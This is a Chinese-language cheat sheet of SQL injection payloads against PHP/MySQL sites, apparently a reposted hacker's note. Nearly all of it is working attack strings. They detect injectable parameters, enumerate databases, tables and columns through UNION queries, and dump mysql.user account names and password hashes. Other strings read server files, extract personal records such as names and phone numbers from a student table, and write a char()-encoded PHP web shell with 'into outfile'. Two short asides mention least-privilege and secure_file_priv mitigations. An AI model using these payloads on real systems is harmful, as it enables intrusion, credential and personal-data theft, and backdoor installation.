
总结的php注入语句

 chaosa 2015-09-05

2008年02月24日 星期日 22:29
1.判断是否存在注入,加';and 1=1;and 1=2
2.判断版本 and ord(mid(version(),1,1))>51 代替。
5.判断数据库连接账号有没有写权限,and (select count(*) from mysql.user)>0 select1,concat(char(124,13,10),SCHEMA_NAME,char(124,13,10)),3,4,5,6,7,8,9,10,11,12,13,14,15 frominformation_schema.SCHEMA limit 0,1/*


先用union select 0,1,TABLE_NAME,3,4 FROM INFORMATION_SCHEMA.TABLES limit 0,1/*把所有的表暴出来
再用union select 0,1,COLUMN_NAME,3,4 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=要查询的表名17,1/*
屡试不爽
http://localhost/inject.php?id=1 and 1=2 union select concat(char(124,13,10),SCHEMA_NAME,char(124,13,10)),2,3,4,5,6,7,8 FROM INFORMATION_SCHEMA.TABLES where information_schema.SCHEMATA.SCHEMA_NAME=0x276773726327 limit 2,1


union select concat(char(124,13,10),TABLE_NAME,char(124,13,10)),2,3,4,5,6,7,8 FROM information_schema.SCHEMATA where information_schema.SCHEMATA.SCHEMA_NAME=0x276773726327

union select 1,2,load_file('c:\123.txt'),4,5,6,into outfile'123.php'


/*相关信息查询
/job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),@@basedir,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 /* and 1=1

current_user() session_user() system_user() @@datadir @@tmpdir @@version_compile_os

job_detail.php?InfoId=347 and 1=2 union select 1,2,3,concat(char(94),char(94),char(94),user,char(94),char(94),char(94)),5,6,7,8 from (select * from (select * from mysql.user order by user limit 0,1) t order by user desc)t limit 1/* and 1=1
暴数据库用户名和密码(前提是网站使用的数据库账号能读取 mysql.user;按最小权限配置的应用账号无权读取该表,这类查询会直接失败)
job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),user,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from mysql.user order by user limit 0,1) t order by user desc)t limit 1/* and 1=1

ob_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),password,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from mysql.user order by user limit 0,1) t order by user desc)t limit 1/* and 1=1

job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),user,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from mysql.user order by user limit 1,1) t order by user desc)t limit 1/* and 1=1

and 1=2 union select 1,concat(char(94),char(94),char(94),user,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from mysql.user order by user limit 4,1) t order by user desc)t limit 1/* and 1=1

/job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),count(*),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from information_schema.tables group by table_schema order by table_schema)t limit 1/* and 1=1

| TABLE_CATALOG | TABLE_SCHEMA | TABLE_NAME | TABLE_TYPE | ENGINE | VERSION | RO
W_FORMAT | TABLE_ROWS | AVG_ROW_LENGTH | DATA_LENGTH | MAX_DATA_LENGTH | INDEX_L
ENGTH | DATA_FREE | AUTO_INCREMENT | CREATE_TIME         | UPDATE_TIME         |
CHECK_TIME | TABLE_COLLATION | CHECKSUM | CREATE_OPTIONS | TABLE_COMMENT |
+---------------+--------------+------------+------------+--------+---------+---
---------+------------+----------------+-------------+-----------------+--------
------+-----------+----------------+---------------------+---------------------+
------------+-----------------+----------+----------------+---------------+
| NULL          | chinapiao    | air_city   | BASE TABLE | MyISAM |      10 | Dy
namic          884 |             39 |       34740 | 281474976710655 |
11264 |         0 |           1982 | 2009-04-09 21:22:59 | 2009-04-09 21:40:25 |
NULL       | utf8_general_ci |     NULL |                             |
爆出所有库名
job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_schema,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables group by table_schema order by table_schema limit 0,1) t order by table_schema desc)t limit 1/* and 1=1
^^^information_schema^^^
job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_schema,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables group by table_schema order by table_schema limit 1,1) t order by table_schema desc)t limit 1/* and 1=1
^^^league^^^
job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_schema,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables group by table_schema order by table_schema limit 2,1) t order by table_schema desc)t limit 1/* and 1=1
^^^mysql^^^

用select查询语句查询数据库
inject.php?id=1 and (select ascii(substr(table_schema,8,1)) from (select * from (select * from information_schema.tables group by table_schema order by table_schema limit 3,1) t order by table_schema desc)t limit 1)>120 and 1=1
inject.php?id=1 and (select ascii(substr(table_schema,8,1)) from (select * from (select * from information_schema.tables group by table_schema order by table_schema limit 3,1) t order by table_schema desc)t limit 1)>116 and 1=1

/*暴表
跨库查询暴表
job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),cast(count(*) as char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from information_schema.tables where table_schema=0x6c6561677565 limit 1/* and 1=1
跨库查询暴列
/job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),cast(count(*) as char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from information_schema.columns where table_name=0x6962665f656d61696c5f6c6f6773 and table_schema=0x6c6561677565 limit 1/* and 1=1

job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),cast(count(*) as char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from information_schema.tables where table_schema=0x73697365 limit 1/* and 1=1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables where table_schema=0x73697365 order by table_schema limit 0,1) t order by table_schema desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables where table_schema=0x73697365 order by table_schema limit 1,1) t order by table_schema desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables where table_schema=0x73697365 order by table_schema limit 2,1) t order by table_schema desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables where table_schema=0x73697365 order by table_schema limit 3,1) t order by table_schema desc)t limit 1/* and 1=1 HTTP/1.1


/*暴列

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),cast(count(*) as char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from information_schema.columns where table_name=0x6d6174726963756c6174657232303035 and table_schema=0x73697365 limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),column_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.columns where table_name=0x6d6174726963756c6174657232303035 and table_schema=0x73697365 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),column_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.columns where table_name=0x6d6174726963756c6174657232303035 and table_schema=0x73697365 order by 1 limit 1,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

/job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),column_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.columns where table_name=0x6d6174726963756c6174657232303035 and table_schema=0x73697365 order by 1 limit 2,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1


/*猜解列值

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),cast(count(*) as char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from matriculater2005 where 1=1 limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),numberid,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),phone,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),linkman,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),specialityid,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),speciality,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

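/*写入php一句话木马(into outfile 需要数据库账号具有 FILE 权限,且受 secure_file_priv 限制;不给应用账号授予 FILE 权限、并把 secure_file_priv 设为专用目录或 NULL,即可阻断这一步)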
<?require($_REQUEST['evil_file_path']);echo "zwell has been here"?>


GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(60),char(63),char(114),char(101),char(113),char(117),char(105),char(114),char(101),char(40),char(36),char(95),char(82),char(69),char(81),char(85),char(69),char(83),char(84),char(91),char(39),char(101),char(118),char(105),char(108),char(95),char(102),char(105),char(108),char(101),char(95),char(112),char(97),char(116),char(104),char(39),char(93),char(41),char(59),char(101),char(99),char(104),char(111),char(32),char(34),char(122),char(119),char(101),char(108),char(108),char(32),char(104),char(97),char(115),char(32),char(98),char(101),char(101),char(110),char(32),char(104),char(101),char(114),char(101),char(34),char(63),char(62),char(13),char(10)),1,1,1,1,1,1,1,1,1,1,1 into outfile '/etc/zwell.php'/* and 1=1 HTTP/1.1
